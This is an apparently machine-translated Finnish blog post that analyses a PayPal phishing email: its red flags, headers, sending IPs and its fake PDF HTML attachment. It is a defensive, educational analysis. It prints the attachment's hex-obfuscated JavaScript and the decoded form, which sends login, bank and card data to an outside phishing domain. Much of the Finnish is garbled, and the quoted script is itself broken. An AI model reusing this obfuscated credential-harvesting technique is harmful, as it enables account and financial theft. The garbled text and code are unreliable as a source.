10Sep

Online-tietoturva: Phishing-sähköpostin anatomian hajoaminen


Nykypäivän maailma, jossa kaikki tiedot ovat verkossa, tietojenkalastelu on yksi suosituimmista ja tuhoisimmista verkkohyökkäyksistä, koska voit aina puhdistaa viruksen, mutta jos pankkisi yksityiskohtia varastetaan, olet pulassa. Tässä on yksi tällainen hyökkäys, jonka saimme.

Älä usko, että vain pankkisi yksityiskohdat ovat tärkeitä: loppujen lopuksi, jos joku voi hallita tilisi sisäänkirjautumista, he eivät vain tiedä kyseisen tilin sisältämiä tietoja, mutta kertoimet ovat, että samaa sisäänkirjaustietoa voidaan käyttää useilla erimuita tilejä.Ja jos he vaarantavat sähköpostitilisi, he voivat nollata kaikki muut salasanasi.

Sen lisäksi, että säilytetään vahvoja ja vaihtelevia salasanoja, sinun on aina oltava etsimässä väärennetyt sähköpostit, jotka peittävät todellisena. Vaikka useimmat tietojenkalasteluyritykset ovat amatöörimäisiä, jotkut ovat varsin vakuuttavia, joten on tärkeää ymmärtää, miten tunnistaa ne pintatasolla ja miten he työskentelevät hupparin alla.

Kuva asirap

: n tutkiminen Mikä on tavallinen näkökulma

Esimerkkisähköpostimme, kuten useimmat tietojenkalastelupyrkimykset, "ilmoittavat" sinulle PayPal-tilisi toiminnasta, mikä normaalisti olisi hälyttävä.Joten toimintapyyntö on tarkistaa / palauttaa tilisi lähettämällä lähes kaikki henkilökohtaiset tiedot, joista voit ajatella. Jälleen tämä on melko kaavaa.

Vaikka varmasti on poikkeuksia, melkein kaikki tietojenkalastelu- ja huijaussähköpostit ovat täynnä punaisia ​​lippuja suoraan viestissä.Vaikka teksti onkin vakuuttava, voit yleensä löytää monia virheitä, jotka ovat täynnä viestirunkoa, mikä osoittaa, että viesti ei ole legitiä.

Message Body

Ensi silmäyksellä tämä on yksi paremmista phishing-sähköposteista, joita olen nähnyt. Ei ole oikeinkirjoitus- tai kieliopillisia virheitä ja sananluku lukee sen mukaan, mitä voit odottaa. Kuitenkin muutamia punaisia ​​lippuja näet, kun tarkastelet sisältöä hieman tarkemmin.

  • "Paypal" - Oikea tapaus on "PayPal"( pääoma P).Näet, että molempia muunnelmia käytetään viestissä.Yritykset ovat hyvin tietoisia brändiään, joten on epävarmaa, että jotain tällaista antaisi läpäisemisen.
  • "salli ActiveX" - Kuinka monta kertaa olet nähnyt legit-verkkopohjaisen liiketoiminnan, jonka koko on Paypal, käyttää omistettua komponenttia, joka toimii vain yhdellä selaimella, varsinkin kun se tukee useita selaimia? Toki, jonnekin siellä yritys tekee sen, mutta tämä on punainen lippu.
  • "turvallisesti". - Huomaa, kuinka tämä sana ei ole rivissä marginaalissa muiden kappaleiden kanssa. Vaikka venytin ikkunan hieman, se ei kääri tai tilaa oikein.
  • "Paypal!" - Tila ennen huutomerkkiä näyttää hankalalta. Ainoa huijaus, josta olen varma, ei tule olemaan legit-sähköpostissa.
  • "PayPal-tilin päivitysmuoto.pdf.htm" - Miksi Paypal liittää "PDF" erityisesti silloin, kun ne voisivat vain linkittää sivun sivustoonsa? Lisäksi, miksi he yrittävät peittää HTML-tiedoston PDF: ksi? Tämä on kaikkien näiden kaikkien maiden suurin puna-lippu.

Viestin otsikko

Kun tarkastelet viestin otsikkoa, näkyviin tulee vielä pari punaista merkkiä:

  • Osoitteesta [email protected].
  • Osoitteeseen puuttuu. En tyhjennyt tätä, se ei yksinkertaisesti ole osa standardiviestiotsikkoa. Tyypillisesti yritys, jolla on nimesi, mukauttaa sähköpostin sinulle.

Liite

Kun avaat liitetiedoston, voit heti nähdä, että asettelu ei ole oikein, koska tyyppitiedot puuttuvat. Jälleen, miksi PayPal lähetti HTML-lomakkeen, kun he voisivat yksinkertaisesti antaa sinulle linkin omalla sivustollaan?

Huomaa: käytimme Gmailin sisäänrakennettua HTML-liitteiden katselulaitetta, mutta suosittelemme, että et avaa liitetiedostoja huijareilta. Ei koskaan. Koskaan. He usein sisältävät hyökkäyksiä, jotka asentavat troijalaisia ​​tietokoneellesi varastaaksesi tilitietosi.

Vierittämällä hieman enemmän näet, että tämä lomake pyytää paitsi PayPal-kirjautumistietojasi, myös pankki- ja luottokorttitietoihin. Jotkut kuvat ovat rikki.

On ilmeistä, että tämä tietojenkalasteluyritys on menossa kaiken kanssa yhdellä swoopilla.

Tekninen erittely

Vaikka sen pitäisi olla melko selkeä perustuen siihen, mikä on selväksi, että tämä on tietojenkalasteluyritys, aion nyt murtaa sähköpostin tekninen koostumus ja nähdä, mitä löydämme.

Liitteen

tiedot Ensimmäinen asia, joka on tarkasteltava on liitteen lomakkeen HTML-lähde, joka toimittaa tiedot vääräksi sivustolle.

Kun lähdettä tarkastellaan nopeasti, kaikki linkit näkyvät oikein, koska ne osoittavat joko "paypal.com" tai "paypalobjects.com", jotka ovat molemmat legit.

Nyt tarkastelemme joitain perustietojen tietoja, jotka Firefox kerää sivulle.

Kuten näette, jotkut grafiikat vedetään verkkotunnuksista "blessedtobe.com", "goodhealthpharmacy.com" ja "pic-upload.de" legit PayPal -verkkojen sijaan.

Tietoa sähköpostin otsakkeista

Seuraavaksi tarkastelemme raakaa sähköpostiviestin otsakkeita. Gmail tekee tämän saatavalla viestin Näytä alkuperäisen valikkovaihtoehdon kautta.

Alkuperäisen viestin otsikkotietoihin näet, että tämä viesti muodostettiin Outlook Expressin avulla 6. Epäilen, että PayPalilla on henkilökunta, joka lähettää kukin näistä viesteistä manuaalisesti vanhan sähköpostiohjelman kautta.

Tarkastelemalla reititystietoja, voimme nähdä sekä lähettäjän että uudelleenlähetyspalvelimen IP-osoitteen.

Käyttäjän IP-osoite on alkuperäinen lähettäjä.IP-tietojen nopea etsintä, voimme nähdä lähettävän IP-osoitteen Saksassa.

Ja kun tarkastelemme uudelleenlähetyspalvelimen( mail.itak.at), IP-osoitetta voimme nähdä, tämä on Itävallassa sijaitseva ISP.Epäilen, että PayPal reitittää sähköpostit suoraan Itävallan Internet-palveluntarjoajan kautta, kun heillä on massiivinen palvelinrakennus, joka pystyy helposti käsittelemään tätä tehtävää.

Missä tiedot siirtyvät?

Joten olemme selvästi määrittäneet, että tämä on tietojenkalastelusähköposti ja kerätty tietoja siitä, mistä viesti on peräisin, mutta entä missä tietoja lähetetään?

Nähdäksesi tämän, meidän on ensin tallennettava HTM-liite työpöydälle ja avattava tekstieditorissa. Selaa läpi, kaikki näyttää olevan kunnossa paitsi, kun saamme epäilyttävän näköisen JavaScript-lohkon.

Javascriptin viimeisen lohkon koko lähteen puhkeaminen näemme:

& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”(i = 0; i & lt; x.length; i + = 2){ y + = unescape( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;

Aina kun näet suuren sekasorvan merkkijonoon näennäisesti satunnaisia ​​kirjaimia ja numeroita, jotka on upotettu Javascript-lohkoon, se on yleensä epäilyttävää.Tarkasteltaessa koodia muuttuja "x" asetetaan tähän suureen merkkijonoon ja dekoodataan sitten muuttujalle "y".Muuttujan "y" lopullinen tulos kirjoitetaan sitten asiakirjaan HTML: ksi.

Koska suuri merkkijono on valmistettu numerot 0-9 ja kirjaimet af, se on todennäköisesti koodaa yksinkertaisen ASCII heksaani muuntaminen:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

Muunnetaan muotoon:

& lt; muodossa name =”pääasiallinen” id =”main”method = "post" action = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;

Ei ole sattumaa, että se dekoodataan kelvolliseksi HTML-lomakekoodiksi, joka lähettää tulokset ei PayPaliin vaan roistovalikkoon.

Lisäksi, kun tarkastelet lomakkeen HTML-lähdettä, näet, että tämä lomakekoodi ei ole näkyvissä, koska se luodaan dynaamisesti Javascriptin kautta. Tämä on älykäs tapa piilottaa, mitä HTML todella tekee, jos joku näkisi vain luotu liitetiedoston lähdekoodin( kuten aikaisemminkin), toisin kuin liitetiedoston avaaminen suoraan tekstieditorissa.

Nopean kiikun suorittaminen loukkaavalla sivustolla näemme tämän verkkotunnuksen, joka isännöi suosittu web-isäntä, 1and1.

Mikä erottuu, verkkotunnus käyttää luettavaa nimeä( toisin kuin "dfh3sjhskjhw.net") ja verkkotunnusta on rekisteröity 4 vuotta. Tämän vuoksi uskon, että tätä verkkotunnusta kaapattiin ja sitä käytettiin salasanana tässä phishing-yrityksessä.

Kyynisyys on hyvä puolustus

Kun se tulee pysymään turvallisena verkossa, se ei koskaan sattuu olemaan hyvää kyynisyyttä.

Vaikka olen varma, että esimerkkisähköpostissa on enemmän punaisia ​​lippuja, olemme maininneet edellä osoitetut indikaattorit vain muutaman minuutin tutkimisen jälkeen. Hypoteettisesti, jos sähköpostin pinnan taso jäljitteli oikean vastapuolensa 100%, tekninen analyysi paljastaisi edelleen sen todellisen luonteen. Siksi tuonti on mahdollista tutkia sekä mitä voit että ei voi nähdä.